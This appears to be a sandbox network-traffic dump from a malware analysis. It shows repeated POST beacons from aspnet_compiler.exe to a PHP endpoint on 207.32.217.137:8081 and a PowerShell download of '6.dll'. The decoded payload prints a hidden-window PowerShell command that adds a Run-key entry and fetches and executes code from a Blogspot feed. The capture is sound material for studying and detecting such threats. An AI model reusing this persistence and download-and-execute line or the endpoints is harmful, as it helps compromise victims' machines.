                                                                                                                                                                      Jan 14, 2022 12:21:42.145461082 CET12559OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 284
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:42.309094906 CET12559INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.440045118 CET12561INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:42 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:43.440301895 CET12561OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.604161978 CET12561INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.233500957 CET12563INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:43 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:44.233944893 CET12563OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.396948099 CET12563INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.025909901 CET12565INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:44 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.026185989 CET12565OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.190582037 CET12565INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.909154892 CET12573INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.909425020 CET12574OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.073987961 CET12574INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.777786970 CET12575INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      13192.168.2.349839207.32.217.1378081C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jan 14, 2022 12:21:36.970643044 CET12548OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:37.140429974 CET12548INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:37.779139996 CET12550INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:37 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:37.788479090 CET12550OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:37.957154989 CET12550INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:38.682542086 CET12552INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:37 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:38.683393002 CET12552OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:38.852834940 CET12552INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:39.591142893 CET12554INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:38 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:39.592585087 CET12554OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:39.761466980 CET12554INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:40.521028042 CET12556INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:39 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:40.533013105 CET12556OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:40.701553106 CET12556INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:41.432369947 CET12558INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:40 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:41.456486940 CET12558OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 286
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:41.625252962 CET12558INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:42.353898048 CET12560INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:41 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:42.731497049 CET12560OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:42.900404930 CET12560INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.682684898 CET12562INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:42 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:43.683010101 CET12562OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.851597071 CET12562INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.575247049 CET12564INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:43 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:44.575479984 CET12564OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.743788004 CET12564INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.468019962 CET12566INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:44 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:45.818732023 CET12573OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:45.986419916 CET12574INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:46.630821943 CET12575INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:45 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.349825142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.349824142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.349827104.16.203.237443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.34982834.102.176.152443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.349829199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.349834142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      8192.168.2.349835104.16.202.237443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      9192.168.2.349836199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.349780104.16.202.237443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:20:22 UTC0OUTGET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.mediafire.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:20:23 UTC0INHTTP/1.1 302 Found
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:20:23 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4; expires=Tue, 14-Jan-2042 11:20:23 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
                                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.mediafire.com
                                                                                                                                                                      Location: https://download2262.mediafire.com/rm83e8erdqxg/nm9ysba5ejf20r8/6.dll
                                                                                                                                                                      Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
                                                                                                                                                                      NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                      Set-Cookie: __cf_bm=1Mb3pJ5w.Ot2Fb7eLywKcJ4WJMhVHjwLChg5edttWOo-1642159223-0-AQP9b9maORl8/ZW5a35dAdkgLoEkYJTt+9trfrULg3vZA8hCd4lTd9WdfzAMeXLgq0AqhEvQkZGAdVd1CtsvNQI=; path=/; expires=Fri, 14-Jan-22 11:50:23 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 6cd679864f6a699f-FRA
                                                                                                                                                                      2022-01-14 11:20:23 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.349784199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:20:23 UTC1OUTGET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: download2262.mediafire.com
                                                                                                                                                                      Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:20:24 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                      server: dsp-0.0.1
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      connection: close
                                                                                                                                                                      content-encoding: binary
                                                                                                                                                                      cache-control: no-store
                                                                                                                                                                      x-robots-tag: noindex, nofollow
                                                                                                                                                                      content-disposition: attachment; filename="6.dll"
                                                                                                                                                                      content-length: 490941
                                                                                                                                                                      date: Fri, 14 Jan 2022 11:20:23 GMT
                                                                                                                                                                      2022-01-14 11:20:24 UTC1INData Raw: 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0d 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 22 20 2d 4e 61 6d 65 20 22 4e 65 74 77 72 69 78 50 61 72 61 6d 22 20 2d 56 61 6c 75 65 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 20 68 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 32 30 3b 69 77 72 20 22 22 68 74 74 70 73 3a 2f 2f 70 36 74 62 62 62 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 61 74 6f 6d 2e 78 6d 6c 22 22 20 2d 75 73 65 42 7c 69 65
                                                                                                                                                                      Data Ascii: start-sleep -s 5New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      2022-01-14 11:20:24 UTC17INData Raw: 2c 32 31 2c 32 34 38 2c 38 38 2c 39 32 2c 32 32 34 2c 32 33 35 2c 32 32 37 2c 32 32 39 2c 32 34 38 2c 31 38 38 2c 31 33 31 2c 31 35 39 2c 39 33 2c 31 32 39 2c 32 33 39 2c 33 39 2c 32 35 35 2c 31 35 35 2c 34 2c 32 34 35 2c 38 36 2c 32 31 2c 32 34 31 2c 32 34 2c 37 2c 32 34 36 2c 31 34 33 2c 31 39 35 2c 34 36 2c 37 30 2c 31 34 36 2c 37 38 2c 31 37 31 2c 31 31 34 2c 32 35 30 2c 31 35 33 2c 32 34 33 2c 32 33 39 2c 38 36 2c 32 34 32 2c 31 34 34 2c 31 33 34 2c 33 37 2c 31 38 39 2c 36 35 2c 31 39 31 2c 32 31 37 2c 31 34 36 2c 31 31 36 2c 33 34 2c 32 31 33 2c 31 34 36 2c 31 31 36 2c 36 31 2c 32 35 33 2c 32 32 32 2c 39 34 2c 39 33 2c 36 32 2c 36 32 2c 31 38 38 2c 36 36 2c 32 35 34 2c 31 37 39 2c 32 30 39 2c 32 35 34 2c 35 33 2c 31 39 37 2c 32 34 34 2c 32 37 2c 31
                                                                                                                                                                      Data Ascii: ,21,248,88,92,224,235,227,229,248,188,131,159,93,129,239,39,255,155,4,245,86,21,241,24,7,246,143,195,46,70,146,78,171,114,250,153,243,239,86,242,144,134,37,189,65,191,217,146,116,34,213,146,116,61,253,222,94,93,62,62,188,66,254,179,209,254,53,197,244,27,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC33INData Raw: 31 36 33 2c 31 39 30 2c 32 32 37 2c 32 36 2c 31 38 37 2c 31 35 37 2c 31 32 38 2c 33 38 2c 31 32 35 2c 33 30 2c 37 38 2c 32 39 2c 31 31 38 2c 32 32 38 2c 38 33 2c 31 33 35 2c 36 35 2c 36 32 2c 31 31 37 2c 31 35 32 2c 31 39 39 2c 31 36 37 2c 31 34 2c 38 31 2c 36 32 2c 31 31 37 2c 35 36 2c 34 2c 31 36 37 2c 31 34 2c 37 37 2c 35 36 2c 31 31 36 2c 34 38 2c 35 34 2c 31 33 36 2c 32 32 37 2c 31 33 31 2c 31 30 36 2c 31 38 39 2c 32 31 2c 32 33 31 2c 31 34 2c 31 39 38 2c 32 32 33 2c 31 33 32 2c 38 37 2c 32 31 33 2c 31 39 31 2c 31 33 37 2c 31 36 33 2c 37 2c 32 32 37 2c 31 38 37 2c 31 39 34 2c 31 35 35 2c 31 37 32 2c 32 33 31 2c 31 39 35 2c 31 33 35 2c 31 39 31 2c 31 38 37 2c 31 33 35 2c 31 35 2c 31 38 33 2c 35 38 2c 31 33 35 2c 31 35 2c 31 32 32 2c 31 34 36 2c 37 39
                                                                                                                                                                      Data Ascii: 163,190,227,26,187,157,128,38,125,30,78,29,118,228,83,135,65,62,117,152,199,167,14,81,62,117,56,4,167,14,77,56,116,48,54,136,227,131,106,189,21,231,14,198,223,132,87,213,191,137,163,7,227,187,194,155,172,231,195,135,191,187,135,15,183,58,135,15,122,146,79
                                                                                                                                                                      2022-01-14 11:20:24 UTC49INData Raw: 32 33 33 2c 32 31 32 2c 32 35 35 2c 31 36 35 2c 37 38 2c 31 36 37 2c 32 35 34 2c 31 31 39 2c 31 35 37 2c 32 33 38 2c 32 36 2c 39 38 2c 38 33 2c 31 38 32 2c 34 37 2c 32 35 35 2c 31 33 30 2c 31 31 36 2c 31 31 37 2c 37 36 2c 36 35 2c 32 34 36 2c 37 39 2c 31 39 31 2c 31 31 32 2c 32 34 35 2c 32 34 37 2c 31 33 39 2c 39 2c 32 32 36 2c 32 30 31 2c 32 30 30 2c 39 34 2c 32 34 35 2c 35 2c 36 33 2c 31 31 2c 31 32 32 2c 32 33 38 2c 32 33 2c 31 35 38 2c 39 37 2c 31 30 39 2c 31 30 39 2c 31 37 30 2c 32 32 38 2c 32 34 38 2c 31 30 37 2c 31 39 35 2c 33 33 2c 35 36 2c 32 30 36 2c 32 34 30 2c 31 30 32 2c 31 31 35 2c 32 31 37 2c 31 38 38 2c 32 30 35 2c 39 33 2c 38 34 2c 31 33 36 2c 32 30 37 2c 31 34 34 2c 32 30 35 2c 31 33 35 2c 31 35 37 2c 31 34 32 2c 31 38 34 2c 36 2c 32 31
                                                                                                                                                                      Data Ascii: 233,212,255,165,78,167,254,119,157,238,26,98,83,182,47,255,130,116,117,76,65,246,79,191,112,245,247,139,9,226,201,200,94,245,5,63,11,122,238,23,158,97,109,109,170,228,248,107,195,33,56,206,240,102,115,217,188,205,93,84,136,207,144,205,135,157,142,184,6,21
                                                                                                                                                                      2022-01-14 11:20:24 UTC65INData Raw: 31 38 34 2c 31 30 38 2c 31 37 33 2c 38 37 2c 37 36 2c 32 34 33 2c 39 2c 31 31 31 2c 36 32 2c 34 2c 31 30 30 2c 32 30 34 2c 31 30 39 2c 32 37 2c 32 32 39 2c 31 35 36 2c 34 34 2c 34 30 2c 39 37 2c 31 38 35 2c 32 32 33 2c 31 33 34 2c 31 38 39 2c 30 2c 36 30 2c 33 34 2c 38 32 2c 38 38 2c 31 2c 32 33 31 2c 36 38 2c 37 36 2c 36 39 2c 37 35 2c 31 37 32 2c 31 30 31 2c 32 31 34 2c 36 32 2c 31 38 38 2c 33 31 2c 31 30 33 2c 32 34 35 2c 39 30 2c 37 2c 31 33 37 2c 31 30 33 2c 36 39 2c 32 36 2c 32 34 33 2c 37 2c 31 38 33 2c 39 30 2c 31 33 35 2c 32 32 35 2c 38 35 2c 31 38 2c 32 33 35 2c 34 38 2c 32 33 35 2c 32 34 30 2c 31 35 32 2c 39 35 2c 31 35 35 2c 33 30 2c 31 31 2c 32 34 39 2c 32 31 31 2c 32 33 35 2c 38 37 2c 37 31 2c 35 35 2c 31 32 2c 39 36 2c 36 2c 32 30 31 2c 32
                                                                                                                                                                      Data Ascii: 184,108,173,87,76,243,9,111,62,4,100,204,109,27,229,156,44,40,97,185,223,134,189,0,60,34,82,88,1,231,68,76,69,75,172,101,214,62,188,31,103,245,90,7,137,103,69,26,243,7,183,90,135,225,85,18,235,48,235,240,152,95,155,30,11,249,211,235,87,71,55,12,96,6,201,2
